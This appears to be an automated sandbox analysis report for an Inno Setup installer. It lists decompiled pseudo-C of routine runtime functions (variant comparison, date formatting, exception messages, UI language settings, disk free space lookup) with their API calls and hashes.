                                                                                    • String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
                                                                                    • API String ID: 2030045667-3391638011
                                                                                    • Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                    • Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
                                                                                    • Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
                                                                                    • Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 69%
                                                                                    			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}
























                                                                                    0x0042f9b8
                                                                                    0x0042f9b8
                                                                                    0x0042f9b9
                                                                                    0x0042f9bb
                                                                                    0x0042f9bf
                                                                                    0x0042f9c2
                                                                                    0x0042f9c5
                                                                                    0x0042f9c8
                                                                                    0x0042f9cf
                                                                                    0x0042f9dc
                                                                                    0x0042fb6d
                                                                                    0x0042fb73
                                                                                    0x0042fb8a
                                                                                    0x0042fbac
                                                                                    0x0042fbbb
                                                                                    0x0042fbc7
                                                                                    0x0042fbce
                                                                                    0x0042fc88
                                                                                    0x0042fc95
                                                                                    0x0042fd0a
                                                                                    0x0042fd19
                                                                                    0x0042fd25
                                                                                    0x0042fd2c
                                                                                    0x0042fde0
                                                                                    0x00000000
                                                                                    0x0042fd32
                                                                                    0x0042fd3c
                                                                                    0x0042fdd6
                                                                                    0x0042fddb
                                                                                    0x00000000
                                                                                    0x0042fd3e
                                                                                    0x0042fd41
                                                                                    0x0042fd42
                                                                                    0x0042fd49
                                                                                    0x0042fd4a
                                                                                    0x0042fd4f
                                                                                    0x0042fd52
                                                                                    0x0042fd55
                                                                                    0x0042fd5f
                                                                                    0x0042fd6c
                                                                                    0x0042fd6e
                                                                                    0x0042fd6e
                                                                                    0x0042fd92
                                                                                    0x0042fd97
                                                                                    0x0042fd9c
                                                                                    0x0042fd9f
                                                                                    0x0042fda2
                                                                                    0x0042fdaf
                                                                                    0x0042fdaf
                                                                                    0x0042fd3c
                                                                                    0x0042fd0c
                                                                                    0x0042fd0c
                                                                                    0x00000000
                                                                                    0x0042fd0c
                                                                                    0x0042fc97
                                                                                    0x0042fc9a
                                                                                    0x0042fc9b
                                                                                    0x0042fca2
                                                                                    0x0042fca3
                                                                                    0x0042fca8
                                                                                    0x0042fcab
                                                                                    0x0042fcb1
                                                                                    0x0042fcba
                                                                                    0x0042fcc9
                                                                                    0x0042fccb
                                                                                    0x0042fccb
                                                                                    0x0042fcde
                                                                                    0x0042fce3
                                                                                    0x0042fce6
                                                                                    0x0042fce9
                                                                                    0x0042fcf6
                                                                                    0x0042fcf6
                                                                                    0x0042fbd4
                                                                                    0x0042fbde
                                                                                    0x0042fc78
                                                                                    0x0042fc7d
                                                                                    0x00000000
                                                                                    0x0042fbe0
                                                                                    0x0042fbe3
                                                                                    0x0042fbe4
                                                                                    0x0042fbeb
                                                                                    0x0042fbec
                                                                                    0x0042fbf1
                                                                                    0x0042fbf4
                                                                                    0x0042fbf7
                                                                                    0x0042fc01
                                                                                    0x0042fc0e
                                                                                    0x0042fc10
                                                                                    0x0042fc10
                                                                                    0x0042fc34
                                                                                    0x0042fc39
                                                                                    0x0042fc3e
                                                                                    0x0042fc41
                                                                                    0x0042fc44
                                                                                    0x0042fc51
                                                                                    0x0042fc51
                                                                                    0x0042fbde
                                                                                    0x0042fbae
                                                                                    0x0042fbae
                                                                                    0x00000000
                                                                                    0x0042fbae
                                                                                    0x0042fb8c
                                                                                    0x0042fb98
                                                                                    0x00000000
                                                                                    0x0042fb98
                                                                                    0x0042fb75
                                                                                    0x0042fb7e
                                                                                    0x00000000
                                                                                    0x0042fb7e
                                                                                    0x0042f9e2
                                                                                    0x0042f9e5
                                                                                    0x0042f9fc
                                                                                    0x0042fa22
                                                                                    0x0042fa31
                                                                                    0x0042fa3d
                                                                                    0x0042fa44
                                                                                    0x0042fb02
                                                                                    0x0042fb03
                                                                                    0x0042fb0a
                                                                                    0x0042fb0b
                                                                                    0x0042fb10
                                                                                    0x0042fb13
                                                                                    0x0042fb19
                                                                                    0x0042fb22
                                                                                    0x0042fb35
                                                                                    0x0042fb37
                                                                                    0x0042fb37
                                                                                    0x0042fb4a
                                                                                    0x0042fb4f
                                                                                    0x0042fb52
                                                                                    0x0042fb55
                                                                                    0x0042fb62
                                                                                    0x0042fa4a
                                                                                    0x0042fa54
                                                                                    0x0042faf2
                                                                                    0x0042faf7
                                                                                    0x00000000
                                                                                    0x0042fa56
                                                                                    0x0042fa59
                                                                                    0x0042fa5a
                                                                                    0x0042fa61
                                                                                    0x0042fa62
                                                                                    0x0042fa67
                                                                                    0x0042fa6a
                                                                                    0x0042fa6d
                                                                                    0x0042fa77
                                                                                    0x0042fa88
                                                                                    0x0042fa8a
                                                                                    0x0042fa8a
                                                                                    0x0042faae
                                                                                    0x0042fab3
                                                                                    0x0042fab8
                                                                                    0x0042fabb
                                                                                    0x0042fabe
                                                                                    0x0042facb
                                                                                    0x0042facb
                                                                                    0x0042fa54
                                                                                    0x0042fa24
                                                                                    0x0042fa24
                                                                                    0x00000000
                                                                                    0x0042fa24
                                                                                    0x0042f9fe
                                                                                    0x0042fa0a
                                                                                    0x00000000
                                                                                    0x0042fa0a
                                                                                    0x0042f9e7
                                                                                    0x0042f9f0
                                                                                    0x0042fde5
                                                                                    0x0042fded
                                                                                    0x0042fded
                                                                                    0x0042f9e5

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                    • Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
                                                                                    • Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
                                                                                    • Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 75%
                                                                                    			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}














                                                                                    0x0041c79d
                                                                                    0x0041c7a0
                                                                                    0x0041c7a2
                                                                                    0x0041c7a6
                                                                                    0x0041c7a7
                                                                                    0x0041c7ac
                                                                                    0x0041c7af
                                                                                    0x0041c7b4
                                                                                    0x0041c7c0
                                                                                    0x0041c7cb
                                                                                    0x0041c7d6
                                                                                    0x0041c7dd
                                                                                    0x0041c7f6
                                                                                    0x0041c7df
                                                                                    0x0041c7e7
                                                                                    0x0041c7e7
                                                                                    0x0041c80a
                                                                                    0x0041c823
                                                                                    0x0041c832
                                                                                    0x0041c838
                                                                                    0x0041c842
                                                                                    0x0041c846
                                                                                    0x0041c84b
                                                                                    0x0041c84b
                                                                                    0x0041c858
                                                                                    0x0041c858
                                                                                    0x0041c838
                                                                                    0x0041c85f
                                                                                    0x0041c862
                                                                                    0x0041c865
                                                                                    0x0041c872

                                                                                    APIs
                                                                                    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
                                                                                    • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DateFormatLocaleThread
                                                                                    • String ID: $yyyy
                                                                                    • API String ID: 3303714858-404527807
                                                                                    • Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                    • Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
                                                                                    • Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
                                                                                    • Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}





























                                                                                    0x0041ef0a
                                                                                    0x0041ef10
                                                                                    0x0041ef13
                                                                                    0x0041ef15
                                                                                    0x0041ef19
                                                                                    0x0041ef1a
                                                                                    0x0041ef1f
                                                                                    0x0041ef22
                                                                                    0x0041ef2f
                                                                                    0x0041ef3e
                                                                                    0x0041ef6e
                                                                                    0x0041ef7a
                                                                                    0x0041ef7f
                                                                                    0x0041ef85
                                                                                    0x0041ef85
                                                                                    0x0041efa7
                                                                                    0x0041efac
                                                                                    0x0041efb1
                                                                                    0x0041efb8
                                                                                    0x0041efc5
                                                                                    0x0041efcf
                                                                                    0x0041efd3
                                                                                    0x0041efda
                                                                                    0x0041efe4
                                                                                    0x0041efe4
                                                                                    0x0041efda
                                                                                    0x0041eff5
                                                                                    0x0041effa
                                                                                    0x0041f009
                                                                                    0x0041f016
                                                                                    0x0041f021
                                                                                    0x0041f027
                                                                                    0x0041f034
                                                                                    0x0041f03a
                                                                                    0x0041f044
                                                                                    0x0041f04a
                                                                                    0x0041f051
                                                                                    0x0041f057
                                                                                    0x0041f05e
                                                                                    0x0041f064
                                                                                    0x0041f080
                                                                                    0x0041f088
                                                                                    0x0041f091
                                                                                    0x0041f094
                                                                                    0x0041f097
                                                                                    0x0041f0a7

                                                                                    APIs
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                    • LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3990497365-0
                                                                                    • Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                    • Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
                                                                                    • Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
                                                                                    • Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 58%
                                                                                    			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}





















                                                                                    0x0040a6d0
                                                                                    0x0040a6d2
                                                                                    0x0040a6d6
                                                                                    0x0040a6e2
                                                                                    0x0040a6ec
                                                                                    0x0040a6ef
                                                                                    0x0040a6f1
                                                                                    0x0040a6f8
                                                                                    0x0040a6fb
                                                                                    0x0040a70c
                                                                                    0x0040a712
                                                                                    0x0040a715
                                                                                    0x0040a718
                                                                                    0x0040a71b
                                                                                    0x0040a721
                                                                                    0x0040a727
                                                                                    0x0040a737
                                                                                    0x0040a737
                                                                                    0x0040a740
                                                                                    0x0040a745
                                                                                    0x0040a749
                                                                                    0x0040a74e
                                                                                    0x0040a753
                                                                                    0x0040a755
                                                                                    0x0040a756
                                                                                    0x0040a75d
                                                                                    0x0040a765
                                                                                    0x0040a76a
                                                                                    0x0040a76a
                                                                                    0x0040a770
                                                                                    0x0040a773
                                                                                    0x0040a773
                                                                                    0x0040a75d
                                                                                    0x0040a77a
                                                                                    0x0040a781
                                                                                    0x0040a781
                                                                                    0x0040a78a
                                                                                    0x0040a794
                                                                                    0x0040a7a2
                                                                                    0x0040a7aa
                                                                                    0x0040a7c7
                                                                                    0x0040a7c7
                                                                                    0x0040a7cf
                                                                                    0x00000000
                                                                                    0x0040a7d7
                                                                                    0x0040a7e1

                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7
                                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
                                                                                      • Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                    • Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
                                                                                    • Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
                                                                                    • Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}






                                                                                    0x00420bde
                                                                                    0x00420be3
                                                                                    0x00420be7
                                                                                    0x00420bef
                                                                                    0x00420bf4
                                                                                    0x00420bf4
                                                                                    0x00420c00
                                                                                    0x00420c07
                                                                                    0x00000000
                                                                                    0x00420c07
                                                                                    0x00420c0d

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE
                                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: GetDiskFreeSpaceExW$kernel32.dll
